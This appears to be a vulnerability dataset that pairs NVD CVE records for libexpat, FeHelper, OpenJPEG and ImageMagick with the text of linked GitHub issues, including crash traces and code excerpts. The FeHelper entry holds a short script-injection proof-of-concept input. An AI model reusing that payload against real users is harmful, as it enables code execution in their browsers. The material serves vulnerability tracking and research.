Advisory" ], "url": "https://github.com/libexpat/libexpat/issues/186" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/libexpat/libexpat/pull/262" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/libexpat/libexpat/pull/262/commits/11f8838bf99ea0a6f0b76f9760c43704d00c4ff6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2019/06/msg00028.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CEJJSQSG3KSUQY4FPVHZ7ZTT7FORMFVD/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/IDAUGEB3TUP6NEKJDBUBZX7N5OAUOOOK/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://seclists.org/bugtraq/2019/Jun/39" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/201911-08" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20190703-0001/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://support.f5.com/csp/article/K51011533" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4040-1/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4040-2/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2019/dsa-4472" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.tenable.com/security/tns-2021-11" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libexpat_project:libexpat:*:*:*:*:*:*:*:*", "matchCriteriaId": "64559605-B284-4E8F-BE76-A52DDC1B26FE", "versionEndExcluding": "2.2.7", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:-:*:*:*", "matchCriteriaId": "CB66DB75-2B16-4EBF-9B93-CE49D8086E41", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*", "matchCriteriaId": "815D70A8-47D3-459C-A32C-9FEACA0659D1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "matchCriteriaId": "F7016A2A-8365-4F1A-89A2-7A19F2BCAE5B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.10:*:*:*:*:*:*:*", "matchCriteriaId": "07C312A0-CD2C-4B9C-B064-6409B25C278F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*", "matchCriteriaId": "CD783B0C-9246-47D9-A937-6144FE8BFF0F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:29:*:*:*:*:*:*:*", "matchCriteriaId": "D100F7CE-FC64-4CC6-852A-6136D72DA419", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*", "matchCriteriaId": "97A4B8DF-58DA-4AB6-A1F9-331B36409BA3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "F1E78106-58E6-4D59-990F-75DA575BFAD9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:oracle:hospitality_res_3700:*:*:*:*:*:*:*:*", "matchCriteriaId": "CF89FEEE-C473-42D7-9F68-602792BF729B", "versionEndExcluding": null, "versionEndIncluding": "5.7.6", "versionStartExcluding": null, "versionStartIncluding": "5.7", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:http_server:12.1.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "DD4552F9-F5B9-4A52-BA5C-D32D49FABD28", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:http_server:12.2.1.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "AD04BEE5-E9A8-4584-A68C-0195CE9C402C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:outside_in_technology:8.5.4:*:*:*:*:*:*:*", "matchCriteriaId": "72F1A960-EBA5-4BDB-B629-20F0D2384562", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:outside_in_technology:8.5.5:*:*:*:*:*:*:*", "matchCriteriaId": "3198F822-43F8-4CB3-97F7-C2982FDA5CBD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:tenable:nessus:*:*:*:*:*:*:*:*", "matchCriteriaId": "D03C75BD-A1EA-4BF3-8C18-17EB3403C004", "versionEndExcluding": "8.15.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "611" ]
611
https://github.com/libexpat/libexpat/issues/186
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "libexpat", "libexpat" ]
valgrind --tool=massif xmlwf clusterfuzz-testcase-4543406568112128.txt reports that xmlwf uses > 2G of memory to load this bogus xml document. [clusterfuzz-testcase-4543406568112128.txt](https://github.com/libexpat/libexpat/files/1664546/clusterfuzz-testcase-4543406568112128.txt) This was reported by oss-fuzz against LibreOffice (https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=5226) which uses expat and has the same memory use so I felt I should pass it on.
[CVE-2018-20843] 88k xml file uses >2G memory
https://api.github.com/repos/libexpat/libexpat/issues/186/comments
7
2018-01-25T15:38:40Z
2019-06-24T18:21:36Z
https://github.com/libexpat/libexpat/issues/186
291,613,149
186
436
CVE-2019-12966
2019-06-26T12:15:08.727
FeHelper through 2019-06-19 allows arbitrary code execution during a JSON format operation, as demonstrated by the {"a":(function(){confirm(1)})()} input.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV31": null, "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/zxlie/FeHelper/issues/63" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/zxlie/FeHelper/issues/63" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fehelper_project:fehelper:*:*:*:*:*:*:*:*", "matchCriteriaId": "1F9F51EC-B8B3-4388-8D31-DC0283E11624", "versionEndExcluding": null, "versionEndIncluding": "2019-06-19", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "74" ]
74
https://github.com/zxlie/FeHelper/issues/63
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "zxlie", "FeHelper" ]
poc: ``` (function(){confirm(1)})() ``` ![image](https://user-images.githubusercontent.com/9510938/60148939-8713f000-9805-11e9-8e3a-0acc74220117.png) ![image](https://user-images.githubusercontent.com/9510938/60148967-aa3e9f80-9805-11e9-8132-0e34655a6dd3.png) when the web with single js content, it may result code execution. (it shouldn't be executed when broswe a single js file without any html tag). I discovered the insecure code in `https://github.com/zxlie/FeHelper/blob/master/apps/json-format/automatic.js` , line 199 to line 206 additionally, I understand the code is compatibilized for bad json content like `{a:1}`, but as a result, it's insecure.
arbitrary code execution when formating json
https://api.github.com/repos/zxlie/FeHelper/issues/63/comments
5
2019-06-26T03:36:43Z
2021-01-03T08:14:11Z
https://github.com/zxlie/FeHelper/issues/63
460,743,213
63
437
CVE-2018-20847
2019-06-26T18:15:10.057
An improper computation of p_tx0, p_tx1, p_ty0 and p_ty1 in the function opj_get_encoding_parameters in openjp2/pi.c in OpenJPEG through 2.3.0 can lead to an integer overflow.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Broken Link", "Third Party Advisory", "VDB Entry" ], "url": "http://www.securityfocus.com/bid/108921" }, { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/uclouvain/openjpeg/commit/5d00b719f4b93b1445e6fb4c766b9a9883c57949" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/uclouvain/openjpeg/issues/431" }, { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/uclouvain/openjpeg/pull/1168/commits/c58df149900df862806d0e892859b41115875845" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2019/07/msg00010.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link", "Third Party Advisory", "VDB Entry" ], "url": "http://www.securityfocus.com/bid/108921" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/uclouvain/openjpeg/commit/5d00b719f4b93b1445e6fb4c766b9a9883c57949" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/uclouvain/openjpeg/issues/431" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/uclouvain/openjpeg/pull/1168/commits/c58df149900df862806d0e892859b41115875845" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2019/07/msg00010.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:uclouvain:openjpeg:*:*:*:*:*:*:*:*", "matchCriteriaId": "2661F1B4-0FA3-4A71-96EC-505B1CD361D4", "versionEndExcluding": null, "versionEndIncluding": "2.3.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "190" ]
190
https://github.com/uclouvain/openjpeg/issues/431
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "uclouvain", "openjpeg" ]
Originally reported on Google Code with ID 431 ``` https://code.google.com/p/chromium/issues/detail?id=431288 Reproduced on trunk r2924 using MacOS x86 ASan build : ASAN_OPTIONS="allocator_may_return_null=1" ./bin/opj_decompress -i ../../ex/0.jp2 -o 0.bmp [INFO] Start to read j2k main header (119). [INFO] Main header has been correctly decoded. [INFO] No decoded area parameters, set the decoded area to the whole image ERROR in tgt_create while allocating node of the tree WARNING: No incltree created. ERROR in tgt_create while allocating node of the tree WARNING: No imsbtree created. ================================================================= ==3245==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x02f03d00 at pc 0x007f193c bp 0xbffa61f8 sp 0xbffa61f4 READ of size 4 at 0x02f03d00 thread T0 #0 0x7f193b in opj_tcd_code_block_dec_allocate /Users/Matt/Dev/OpenJpeg/issue398/src/lib/openjp2/tcd.c:1051:13 #1 0x7f0bed in opj_tcd_init_decode_tile /Users/Matt/Dev/OpenJpeg/issue398/src/lib/openjp2/tcd.c:1012:1 #2 0x79bfce in opj_j2k_read_tile_header /Users/Matt/Dev/OpenJpeg/issue398/src/lib/openjp2/j2k.c:8008:15 #3 0x7b3007 in opj_j2k_decode_tiles /Users/Matt/Dev/OpenJpeg/issue398/src/lib/openjp2/j2k.c:9543:23 #4 0x799b07 in opj_j2k_exec /Users/Matt/Dev/OpenJpeg/issue398/src/lib/openjp2/j2k.c:7435:41 #5 0x7a3723 in opj_j2k_decode /Users/Matt/Dev/OpenJpeg/issue398/src/lib/openjp2/j2k.c:9762:15 #6 0x7ba8df in opj_jp2_decode /Users/Matt/Dev/OpenJpeg/issue398/src/lib/openjp2/jp2.c:1398:8 #7 0x7c6c83 in opj_decode /Users/Matt/Dev/OpenJpeg/issue398/src/lib/openjp2/openjpeg.c:412:10 #8 0x5d12c in main /Users/Matt/Dev/OpenJpeg/issue398/src/bin/jp2/opj_decompress.c:821:10 #9 0x9a68d6d8 in start (/usr/lib/system/libdyld.dylib+0x36d8) #10 0x4 (<unknown module>) 0x02f03d00 is located 0 bytes to the right of 7168-byte region [0x02f02100,0x02f03d00) allocated by thread T0 here: #0 0x2c0dba in wrap_malloc (/Users/Matt/Dev/llvm-clang-3.5.0-macosx-apple-darwin/lib/clang/3.5.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib+0x2fdba) #1 0x7f08b9 in opj_tcd_init_decode_tile /Users/Matt/Dev/OpenJpeg/issue398/src/lib/openjp2/tcd.c:1012:1 #2 0x79bfce in opj_j2k_read_tile_header /Users/Matt/Dev/OpenJpeg/issue398/src/lib/openjp2/j2k.c:8008:15 #3 0x7b3007 in opj_j2k_decode_tiles /Users/Matt/Dev/OpenJpeg/issue398/src/lib/openjp2/j2k.c:9543:23 #4 0x799b07 in opj_j2k_exec /Users/Matt/Dev/OpenJpeg/issue398/src/lib/openjp2/j2k.c:7435:41 #5 0x7a3723 in opj_j2k_decode /Users/Matt/Dev/OpenJpeg/issue398/src/lib/openjp2/j2k.c:9762:15 #6 0x7ba8df in opj_jp2_decode /Users/Matt/Dev/OpenJpeg/issue398/src/lib/openjp2/jp2.c:1398:8 #7 0x7c6c83 in opj_decode /Users/Matt/Dev/OpenJpeg/issue398/src/lib/openjp2/openjpeg.c:412:10 #8 0x5d12c in main /Users/Matt/Dev/OpenJpeg/issue398/src/bin/jp2/opj_decompress.c:821:10 #9 0x9a68d6d8 in start (/usr/lib/system/libdyld.dylib+0x36d8) #10 0x4 (<unknown module>) SUMMARY: AddressSanitizer: heap-buffer-overflow /Users/Matt/Dev/OpenJpeg/issue398/src/lib/openjp2/tcd.c:1051 opj_tcd_code_block_dec_allocate Shadow bytes around the buggy address: 0x205e0750: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x205e0760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x205e0770: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x205e0780: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x205e0790: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x205e07a0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x205e07b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x205e07c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x205e07d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x205e07e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x205e07f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc ASan internal: fe ==3245==ABORTING ``` Reported by [mayeut](https://github.com/mayeut) on 2014-11-14 19:45:14
Heap-buffer-overflow in opj_tcd_init_decode_tile
https://api.github.com/repos/uclouvain/openjpeg/issues/431/comments
11
2014-11-14T19:45:14Z
2022-09-20T15:12:50Z
https://github.com/uclouvain/openjpeg/issues/431
87,401,059
431
438
CVE-2019-12974
2019-06-26T18:15:10.167
A NULL pointer dereference in the function ReadPANGOImage in coders/pango.c and the function ReadVIDImage in coders/vid.c in ImageMagick 7.0.8-34 allows remote attackers to cause a denial of service via a crafted image.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.0" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV31": null, "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "cve@mitre.org", "tags": null, "url": "http://www.securityfocus.com/bid/108913" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1515" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2019/08/msg00021.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2020/08/msg00030.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://usn.ubuntu.com/4192-1/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://www.debian.org/security/2020/dsa-4712" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "http://www.securityfocus.com/bid/108913" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1515" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2019/08/msg00021.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.debian.org/debian-lts-announce/2020/08/msg00030.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://usn.ubuntu.com/4192-1/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://www.debian.org/security/2020/dsa-4712" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-34:*:*:*:*:*:*:*", "matchCriteriaId": "F10870C6-6679-45A8-8F7F-8C3C295A4E29", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/ImageMagick/ImageMagick/issues/1515
[ "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [ Y ] I have written a descriptive issue title - [ Y ] I have verified that I am using the latest version of ImageMagick - [ Y ] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> There is a null pointer deference vulnerablity in function ReadPANGOImage in coders/pango.c ``` option=GetImageOption(image_info,"filename"); if (option == (const char *) NULL) property=InterpretImageProperties((ImageInfo *) image_info,image, image_info->filename,exception); else if (LocaleNCompare(option,"pango:",6) == 0) property=InterpretImageProperties((ImageInfo *) image_info,image,option+6, exception); else property=InterpretImageProperties((ImageInfo *) image_info,image,option, exception); (void) SetImageProperty(image,"caption",property,exception); ``` (https://github.com/ImageMagick/ImageMagick/blob/master/coders/pango.c#L202) The return value of InterpretImageProperties may be NULL, and then there is a null pointer deference. See https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=6152 and https://github.com/ImageMagick/ImageMagick/commit/93a9ccc85bd62b21bc4246fc6a8c2b7a32f8d678 for details.
Null pointer deference in function ReadPANGOImage in coders/pango.c
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1515/comments
3
2019-03-21T03:25:02Z
2019-06-27T01:28:59Z
https://github.com/ImageMagick/ImageMagick/issues/1515
423,558,712
1,515
439
CVE-2019-12975
2019-06-26T18:15:10.213
ImageMagick 7.0.8-34 has a memory leak vulnerability in the WriteDPXImage function in coders/dpx.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "cve@mitre.org", "tags": [ "Broken Link", "Third Party Advisory", "VDB Entry" ], "url": "http://www.securityfocus.com/bid/108913" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1517" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4192-1/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4712" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link", "Third Party Advisory", "VDB Entry" ], "url": "http://www.securityfocus.com/bid/108913" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1517" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4192-1/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4712" } ]
